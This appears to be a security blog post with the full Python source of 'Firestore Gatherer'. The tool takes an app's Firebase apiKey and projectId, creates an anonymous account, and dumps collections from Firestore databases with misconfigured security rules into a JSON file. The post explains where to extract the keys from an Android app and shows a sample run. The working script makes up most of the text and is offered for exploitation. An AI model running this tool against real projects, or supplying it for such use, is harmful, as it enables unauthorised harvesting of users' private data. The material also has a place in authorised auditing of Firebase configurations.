Firestore Gatherer - Dump of an unprotected Firestore database

Introduction️

Firebase Firestore is a NoSQL cloud database provided by Google as part of the Firebase platform that allows developers to store, synchronize and query data in real-time for web, mobile and server applications. Data are organized into individual documents grouped into collections. Each document is a JSON data structure containing key-value pairs.️

Regarding the possible security issues that could be left unprotected by a project that uses Firebase Firestore, here are some points to consider:

Security Rules misconfigured: Firestore allows developers to set security rules that control who can read and write to the database. If these rules are not configured correctly, it is possible for unauthorized access to the database.️
Lack of user access control: If user authentication and authorization are not implemented properly, unauthorized users may be able to access sensitive data in Firestore.️

For the exploitation of these vulnerabilities a tool in Python has been developed that from some parameters, which can be obtained from the original application that uses the database, creates an anonymous user account and saves a copy of the database in a file in JSON format.️

Use of Firestore Gatherer️

To use the program, we first need to define a couple of variables in a JSON configuration file, apiKey and projectId. In the case of an Android application, these can be obtained by unpacking it and looking at the res/values/strings.xml file. This would be the resulting file.

{
    "apiKey": "Valor de la variable google_api_key",
    "projectId": "Valor de la variable project_id"
}

Parameters to use are the following:

-f: The JSON️ configuration file
-c: The collection of the database to obtain, separated by commas, for example collection1,collection2.️
-t: Specify the following settings to save the creation and modification dates of each document✍️
-a: By default the program only downloads the first page of documents from each collection. If this parameter is specified, all will be downloaded. WARNING: THIS MAY CONSUME THE DATABASE QUOTA AND RESULT IN EXTRA BILLING
-o: The configuration file where the database will be stored

That’s an example of its execution:

$ firebase_gatherer.py -f firebase_cfg.json -c collection1,collection2,collection3 -o firebase_db.json
Welcome to Firebase Gatherer. Gathering ['collection1', 'collection2', 'collection3'] collections from red-alloy-245217 project.
WARNING:root:From collection collection1 fetched 3 records
WARNING:root:From collection collection2 fetched 3 records
WARNING:root:From collection collection3 fetched 25 records

Source code️

import argparse
import json
import logging
import os
import requests

FIREBASE_DOCUMENTS_ENDPOINT = 'https://firestore.googleapis.com/v1/projects/{0}/databases/(default)/documents/{1}'
GOOGLE_IDENTITY_ENDPOINT = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser'

firestore_rest_errors = {
    'ABORTED': 'The request conflicted with another request.',
    'ALREADY_EXISTS': 'The request tried to create a document that already exists.',
    'DEADLINE_EXCEEDED': 'The Cloud Firestore server handling the request exceeded a deadline.',
    'FAILED_PRECONDITION': 'The request did not meet one of its preconditions. For example, a query request might require an index not yet defined. See the message field in the error response for the precondition that failed.',
    'INTERNAL': 'The Cloud Firestore server returned an error.',
    'INVALID_ARGUMENT': 'A request parameter includes an invalid value. See the message field in the error response for the invalid value.',
    'NOT_FOUND': 'The request attempted to update a document that does not exist.',
    'PERMISSION_DENIED': 'The user is not authorized to make this request.',
    'RESOURCE_EXHAUSTED': 'The project exceeded either its quota or the region/multi-region capacity.',
    'UNAUTHENTICATED': 'The request did not include valid authentication credentials.',
    'UNAVAILABLE': 'The Cloud Firestore server returned an error.'    
}

'''
proxy_dict = { 
        'http'  : 'http://127.0.0.1:8888', 
        'https' : 'http://127.0.0.1:8888',
}
'''
proxy_dict = {}

def get_document_field(field_type, value):
    field = None
    # Check type and value
    if field_type in ['stringValue', 'doubleValue', 'booleanValue', 'nullValue', 'timestampValue', 'referenceValue']:
        field = value
    elif field_type == 'integerValue':
        field = int(value)
    elif field_type == 'mapValue':
        field = get_document_fields(value, {}, False)
    elif field_type == 'arrayValue':
        field = []
        for val in value['values']:
            for field_type, value in val.items():
                field.append(get_document_field(field_type, value))
    elif field_type == 'geoPointValue':
        field = str(value['latitude']) + ', ' + str(value['longitude'])
    return field

def get_document_fields(doc, document, timestamp):
    for field_name, field_value in doc['fields'].items():
        for field_type, value in field_value.items():
            document[field_name] = get_document_field(field_type, value)
    if timestamp and 'createTime' in document and 'updateTime' in document:
        document['create_time'] = doc['createTime']
        document['update_time'] = doc['updateTime']
    return document

def get_firestore_collection(collection_name, timestamp, retrieve_all_pages):
    documents = []
    next_page_token = None
    while True:
        url = FIREBASE_DOCUMENTS_ENDPOINT.format(firebaseConfig['projectId'], collection_name)
        headers = {
            'Authorization': 'Firebase ' + firebaseConfig['tokenId']
        }
        params_dict = {}
        if next_page_token != None:
            params_dict['pageToken'] = next_page_token
        req = requests.get(url, headers=headers, params=params_dict, proxies=proxy_dict)
        req_json = req.json()
        if req.status_code != 200:
            logging.error(firestore_rest_errors[req_json['error']['status']] + ' Retrying...')
            generate_anon_token()
            continue

        if 'documents' in req_json:
            for doc in req_json['documents']:
                document = {}
                document['id'] = doc['name']
                document = get_document_fields(doc, document, timestamp)
                documents.append(document)
        
        logging.warning('From collection ' + collection_name + ' fetched ' + str(len(documents)) + ' records')

        if 'nextPageToken' in req_json and retrieve_all_pages:
            next_page_token = req_json['nextPageToken']
        else:
            break
    return documents

def generate_anon_token():
    params_dict = {
        'key': firebaseConfig['apiKey']
    }
    req = requests.post(GOOGLE_IDENTITY_ENDPOINT, params=params_dict, proxies=proxy_dict)
    json_response = req.json()
    firebaseConfig['tokenId'] = json_response['idToken']
    json.dump(firebaseConfig, open(filename, 'w'), indent=4)
    logging.warning('Generated new token id: ' + firebaseConfig['tokenId'][:8] + '...')

def get_arguments():
    parser = argparse.ArgumentParser(prog='Firestore Gatherer', description='Gather the contents of an unprotected Firestore Database.')
    parser.add_argument('-f', '--config-file', help='File containing the Firestore configuration', required=True)
    parser.add_argument('-c', '--collections', help='Names of the collections, separated by commas. Example: collection1,collection2', required=True)
    parser.add_argument('-t', '--timestamp', help='Save the timestamp for every document.', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-a', '--retrieve-all', help='By default the program only fetches the first page of every collection. With this adjustment, it will retrieve all pages. WARNING: THIS CAN CONSUME THE DATABASE QUOTA AND INCUR INTO EXTRA BILLING!!!', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-o', '--output-file', help='File to save the database.', required=True)
    return parser.parse_args()

# Load configuration from file
args = get_arguments()
filename = args.config_file
if not os.path.exists(filename):
    logging.error('The specified filename does not exist')
    exit(-1)
try:
    firebaseConfig = json.load(open(filename))
    for key, val in firebaseConfig.items():
        # all fields ['apiKey', 'authDomain', 'databaseURL', 'projectId', 'storageBucket', 'messagingSenderId', 'appId', 'tokenId']
        if key not in ['apiKey', 'projectId', 'tokenId']:
            raise Exception()
except:
    logging.error('The loaded file is invalid')
    exit(-1)

# Generate token
if 'tokenId' not in firebaseConfig:
    generate_anon_token()

# Collection argument
try:
    collections = args.collections.split(',')
except:
    logging.error('Invalid collections specified')
    exit(-1)

# Other arguments
timestamp = args.timestamp
output_file = args.output_file
retrieve_all = args.retrieve_all

print('Welcome to Firebase Gatherer. Gathering ' + str(collections) + ' collections from ' + firebaseConfig['projectId'] + ' project.')

lib = []
for collection in collections:
    col = {}
    col['name'] = collection
    col['documents'] = get_firestore_collection(collection, timestamp, retrieve_all)
    lib.append(col)

json_dump = json.dump(lib, open(output_file, 'w'), indent=4)

Introduction️#

Use of Firestore Gatherer️#

Source code️#

Introduction️

Use of Firestore Gatherer️

Source code️